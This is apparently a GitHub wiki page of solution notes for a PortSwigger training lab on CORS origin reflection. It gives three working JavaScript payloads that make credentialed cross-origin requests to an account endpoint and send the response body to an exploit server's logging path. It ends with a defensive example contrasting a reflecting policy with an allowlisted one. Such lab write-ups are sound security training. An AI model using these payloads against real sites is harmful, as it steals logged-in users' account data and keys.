Cross origin resource sharing (CORS) - gachikuku/portswigger GitHub Wiki

Apprentice lab:
CORS vulnerability with basic origin reflection

  • Solution

    1. Log in as wiener:peter and look at the response headers

    2. An Access-Control-Allow-Credentials: true header in the response indicates credentialed CORS support. Add an Origin header to the request and set it to an arbitrary website.

    3. The submitted Origin value is reflected back in the Access-Control-Allow-Origin response header.

    4. HTML payloads:

      1. Portswigger's payload

        <script>
            var req = new XMLHttpRequest();
            req.onload = reqListener;
            // Credentialed cross-origin request to the lab's account endpoint
            req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
            req.withCredentials = true;
            req.send();

            // Once the response arrives, send its body to the exploit server's /log endpoint
            function reqListener() {
                location='/log?key='+this.responseText;
            };
        </script>
      2. Popo hack's payload

        <script>
            const request = new XMLHttpRequest()

            // "uuid" stands for the lab's own identifier
            request.open("get", "https://uuid.web-security-academy.net/accountDetails", true)

            // Redirect to the exploit server's /popo endpoint with the response body as the key parameter
            request.onload = () => {
                window.location.href = "/popo?key=" + request.responseText
            }

            request.withCredentials = true
            request.send()
        </script>
      3. Rana Khalil's payload

        <script>
            var xhr = new XMLHttpRequest();
            // "uuid" stands for the lab's own identifier
            var url = "https://uuid.web-security-academy.net";

            // When the request completes, log the response body via the exploit server's /log endpoint
            xhr.onreadystatechange = function() {
                if (xhr.readyState == XMLHttpRequest.DONE) {
                    fetch("/log?key=" + xhr.responseText);
                }
            };

            xhr.open('GET', url + "/accountDetails", true);
            xhr.withCredentials = true;
            xhr.send(null);
        </script>
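
As an added example (not code from the lab, PortSwigger, or this wiki's author), here are the two server-side CORS policies this lab contrasts, modelled as plain functions, together with the reflection check behind solution steps 2 and 3; the probe origin and allowlist are constructed values.

```javascript
// Vulnerable policy: echoes whatever Origin the request carries and also
// allows credentials, so any site can read the authenticated response.
function corsHeadersReflecting(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened policy: only an exact match against a fixed allowlist of full
// origins (scheme + host + port) is echoed back. Anything else gets no CORS
// headers at all, so the browser refuses the cross-origin read.
function corsHeadersAllowlisted(requestOrigin, allowlist) {
  if (!requestOrigin || !allowlist.includes(requestOrigin)) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    // Responses now differ per Origin, so caches must key on it.
    Vary: "Origin",
  };
}

// The check from steps 2 and 3: send an arbitrary Origin and see whether it
// comes back in Access-Control-Allow-Origin alongside
// Access-Control-Allow-Credentials: true. Both together mean the bug is there.
function reflectsOriginWithCredentials(probeOrigin, responseHeaders) {
  return (
    responseHeaders["Access-Control-Allow-Origin"] === probeOrigin &&
    responseHeaders["Access-Control-Allow-Credentials"] === "true"
  );
}

// Constructed values for demonstration (not from the lab).
const PROBE = "https://probe.example";
const ALLOWED = ["https://app.example", "https://admin.example"];

console.log(reflectsOriginWithCredentials(PROBE, corsHeadersReflecting(PROBE)));          // true
console.log(reflectsOriginWithCredentials(PROBE, corsHeadersAllowlisted(PROBE, ALLOWED))); // false
```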